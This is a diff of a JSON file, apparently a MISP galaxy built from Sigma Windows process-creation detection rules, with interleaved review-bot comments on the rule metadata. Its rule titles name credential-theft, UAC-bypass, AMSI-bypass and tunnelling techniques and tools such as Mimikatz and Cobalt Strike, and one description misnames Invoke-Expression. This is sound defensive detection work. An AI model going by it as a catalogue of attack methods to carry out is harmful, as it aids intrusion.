"f303a39a-6255-4b89-aecc-18c4d8ca7163", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a642964e-bead-4bed-8910-1bb4d63e3b4d", "value": "Mimikatz Command Line" }, 
@@ -44575,6 +57316,15 @@ "attack.t1485" ] }, + "related": [ + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c1d867fe-8d95-4487-aab4-e53f2d339f90", "value": "Renamed Sysinternals Sdelete Usage" }, @@ -44591,8 +57341,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/cglyer/status/1183756892952248325", "https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers", + "https://twitter.com/cglyer/status/1183756892952248325", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_switch.yml" ], "tags": [ @@ -44616,10 +57366,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/", + "https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/", "https://github.com/defaultnamehere/cookie_crimes/", "https://mango.pdf.zone/stealing-chrome-cookies-without-a-password", - "https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/", + "https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chromium_headless_debugging.yml" ], "tags": [ 
@@ -44627,11 +57377,20 @@ "attack.t1185" ] }, + "related": [ + { + "dest-uuid": "544b0346-29ad-41e1-a808-501bb4193f47", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", "value": "Potential Data Stealing Via Chromium Headless Debugging" }, { - "description": "Detects suspicious ways to run Invoke-Execution using IEX acronym", + "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", "meta": { "author": "Florian Roth", "creation_date": "2022/03/24", @@ -44672,6 +57431,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6c6d9280-e6d0-4b9d-80ac-254701b64916", "value": "NTLM Coercion Via Certutil.exe" }, @@ -44740,8 +57508,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://cyber.wtf/2021/11/15/guess-whos-back/", "https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html", + "https://cyber.wtf/2021/11/15/guess-whos-back/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_emotet_rundll32_execution.yml" ], "tags": [ @@ -44749,6 +57517,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", "value": "Emotet RunDLL32 Process Creation" }, 
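Review bot: The changed description in `@@ -44627,11 +57377,20 @@` names the cmdlet as `Invoke-Execution`, but `IEX` is the built-in alias of `Invoke-Expression`; the switch from `acronym` to `alias` is correct and the cmdlet name should follow it. The intended line is `"description": "Detects suspicious ways to run Invoke-Expression using IEX alias",`. This text is presumably taken from the upstream Sigma rule, so the fix belongs there as well.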
@@ -44789,8 +57566,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", "https://github.com/OTRF/detection-hackathon-apt29/issues/6", + "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml" ], "tags": [ @@ -44798,6 +57575,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "da2738f2-fadb-4394-afa7-0a0674885afa", "value": "Sdclt Child Processes" }, @@ -44838,9 +57624,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/neonprimetime/status/1435584010202255375", - "https://www.joesandbox.com/analysis/476188/1/iochtml", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444", + "https://www.joesandbox.com/analysis/476188/1/iochtml", + "https://twitter.com/neonprimetime/status/1435584010202255375", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_cve_2021_40444.yml" ], "tags": [ @@ -44848,6 +57634,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "894397c6-da03-425c-a589-3d09e7d1f750", "value": "CVE-2021-40444 Process Pattern" }, 
@@ -44864,8 +57659,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hvs-consulting.de/lazarus-report/", "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", + "https://www.hvs-consulting.de/lazarus-report/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml" ], "tags": [ @@ -44874,6 +57669,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "24c4d154-05a4-4b99-b57d-9b977472443a", "value": "Lazarus Activity Dec20" }, @@ -44890,8 +57694,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", + "https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gamaredon_ultravnc.yml" ], "tags": [ @@ -44926,6 +57730,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "242301bc-f92f-4476-8718-78004a6efd9f", "value": "Suspicious Load DLL via CertOC.exe" }, @@ -44951,6 +57764,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", "value": "UAC Bypass Using Consent and Comctl32 - Process" }, 
@@ -44967,8 +57789,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/", "https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/", + "https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml" ], "tags": [ @@ -44976,6 +57798,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", "value": "Ie4uinit Lolbin Use From Invalid Path" }, @@ -44992,8 +57823,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml" ], "tags": [ @@ -45003,6 +57834,15 @@ "car.2019-04-001" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "be344333-921d-4c4d-8bb8-e584cf584780", "value": "UAC Bypass via Event Viewer" }, 
@@ -45052,6 +57892,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", "value": "Invoke-Obfuscation COMPRESS OBFUSCATION" }, @@ -45068,8 +57917,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml" ], "tags": [ @@ -45102,6 +57951,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", "value": "Download Arbitrary Files Via MSOHTMED.EXE" }, @@ -45129,6 +57987,22 @@ "attack.t1566.001" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "864403a1-36c9-40a2-a982-4c9a45f7d833", "value": "Exploit for CVE-2017-0261" }, 
@@ -45145,7 +58019,7 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://attack.mitre.org/techniques/T1037/", + "https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml" ], "tags": [ @@ -45153,6 +58027,15 @@ "attack.persistence" ] }, + "related": [ + { + "dest-uuid": "eb125d40-0b2d-41ac-a71a-3229241c2cd3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", "value": "Logon Scripts (UserInitMprLogonScript)" }, @@ -45177,6 +58060,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", "value": "Wmiprvse Spawning Process" }, @@ -45202,6 +58094,15 @@ "attack.t1003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", "value": "New Network Provider - CommandLine" }, @@ -45227,6 +58128,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f35c5d71-b489-4e22-a115-f003df287317", "value": "CobaltStrike Process Patterns" }, 
@@ -45253,6 +58163,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "af77cf95-c469-471c-b6a0-946c685c4798", "value": "Proxy Execution via Wuauclt" }, @@ -45270,7 +58189,6 @@ "logsource.product": "windows", "refs": [ "https://github.com/vanhauser-thc/thc-hydra", - "https://attack.mitre.org/techniques/T1110/001/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_hydra.yml" ], "tags": [ @@ -45295,8 +58213,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", "https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html", + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml" ], "tags": [ @@ -45329,6 +58247,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3c05e90d-7eba-4324-9972-5d7f711a60a8", "value": "UAC Bypass Tools Using ComputerDefaults" }, 
@@ -45370,10 +58297,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", "https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt", "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", - "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml" ], "tags": [ @@ -45397,8 +58324,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf", "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/", + "https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msra_process_injection.yml" ], "tags": [ @@ -45432,6 +58359,15 @@ "attack.t1197" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", "value": "Monitoring For Persistence Via BITS" }, 
@@ -45481,6 +58417,15 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2afafd61-6aae-4df4-baed-139fa1f4c345", "value": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)" }, @@ -45520,8 +58465,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet", "https://twitter.com/kmkz_security/status/1220694202301976576", + "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdp_hijack_shadowing.yml" ], "tags": [ @@ -45529,6 +58474,15 @@ "attack.t1563.002" ] }, + "related": [ + { + "dest-uuid": "e0033c16-a07e-48aa-8204-7c3ca669998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6ba5a05f-b095-4f0a-8654-b825f4f16334", "value": "MSTSC Shadowing" }, @@ -45545,9 +58499,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=", "https://twitter.com/cyb3rops/status/972186477512839170", "https://securelist.com/apt-slingshot/84312/", + "https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml" ], "tags": [ 
@@ -45556,6 +58510,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d465d1d8-27a2-4cca-9621-a800f37cf72e", "value": "Equation Group DLL_U Load" }, @@ -45573,8 +58536,8 @@ "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/", - "http://www.xuetr.com/", "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", + "http://www.xuetr.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml" ], "tags": "No established tags" @@ -45596,13 +58559,13 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/", "https://twitter.com/xorJosh/status/1598646907802451969", "https://ngrok.com/docs", + "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection", "https://www.softwaretestinghelp.com/how-to-use-ngrok/", - "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/", - "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml" ], "tags": [ 
@@ -45610,9 +58573,41 @@ "attack.t1572" ] }, + "related": [ + { + "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "value": "Ngrok Usage" }, + { + "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_set_unsecure_powershell_policy.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/de-de/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_set_unsecure_powershell_policy.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "value": "Potential PowerShell Execution Policy Tampering - ProcCreation" + }, { "description": "Detects usage of a CLSID folder name located in a suspicious location from the commandline as seen being used in IcedID", "meta": { 
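Review bot: The new `Potential PowerShell Execution Policy Tampering - ProcCreation` entry carries only the tactic tag `attack.defense_evasion` and no `related` block, so unlike the neighbouring entries it will not be linked to any ATT&CK technique in the galaxy; if the upstream Sigma rule carries a technique tag, the matching `related` element should be generated alongside it. `"falsepositive": ["Unknown"]` on a `level: high` rule gives analysts nothing to tune on, and execution-policy changes are routinely made by configuration-management and deployment scripts, so a note such as `"Administrative scripts and software deployment tooling that set the execution policy"` would be expected before this is consumed as high-confidence. The reference URL is the German-locale path `learn.microsoft.com/de-de/...`; prefer the `en-us` or locale-neutral path so the link is stable for every reader. A practitioner would also want the caveat, documented in the linked Microsoft page, that the execution policy is not a security boundary, so a match here indicates tampering intent rather than a bypassed control.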
@@ -45650,10 +58645,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/", "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml" ], "tags": [ @@ -45661,6 +58656,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b96b2031-7c17-4473-afe7-a30ce714db29", "value": "Use of FSharp Interpreters" }, @@ -45677,8 +58681,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_applications_spawning_wmi_commandline.yml" ], "tags": [ 
@@ -45689,6 +58693,29 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "518643ba-7d9c-4fa5-9f37-baed36059f6a", "value": "Office Applications Spawning Wmi Cli" }, @@ -45705,9 +58732,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/pabraeken/status/995837734379032576", "https://twitter.com/pabraeken/status/999090532839313408", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/", + "https://twitter.com/pabraeken/status/995837734379032576", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdeploy.yml" ], "tags": [ @@ -45715,6 +58742,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "646bc99f-6682-4b47-a73a-17b1b64c9d34", "value": "Execute Files with Msdeploy.exe" }, @@ -45740,6 +58776,15 @@ "attack.t1528" ] }, + "related": [ + { + "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d2eb17db-1d39-41dc-b57f-301f6512fa75", "value": "Suspicious Command With Teams Objects Pathes" }, 
@@ -45756,8 +58801,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/mattifestation/status/735261176745988096", "https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120", + "https://twitter.com/mattifestation/status/735261176745988096", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_amsi_bypass.yml" ], "tags": [ @@ -45768,28 +58813,6 @@ "uuid": "30edb182-aa75-42c0-b0a9-e998bb29067c", "value": "Powershell AMSI Bypass via .NET Reflection" }, - { - "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", - "meta": { - "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", - "creation_date": "2018/09/03", - "falsepositive": "No established falsepositives", - "filename": "proc_creation_win_susp_powershell_enc_cmd.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_enc_cmd.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", - "value": "Suspicious Encoded PowerShell Command Line" - }, { "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", "meta": { 
@@ -45827,8 +58850,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/skelsec/pypykatz", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz", + "https://github.com/skelsec/pypykatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pypykatz.yml" ], "tags": [ @@ -45836,6 +58859,15 @@ "attack.t1003.002" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a29808fd-ef50-49ff-9c7a-59a9b040b404", "value": "Registry Parse with Pypykatz" }, @@ -45852,9 +58884,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", - "https://twitter.com/bohops/status/1477717351017680899?s=12", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/", + "https://twitter.com/bohops/status/1477717351017680899?s=12", + "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml" ], "tags": [ 
@@ -45877,9 +58909,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://twitter.com/0gtweet/status/1564968845726580736", "https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml" ], "tags": [ @@ -45889,6 +58921,22 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", "value": "Suspicious Ldifde Command Usage" }, @@ -45917,6 +58965,29 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + 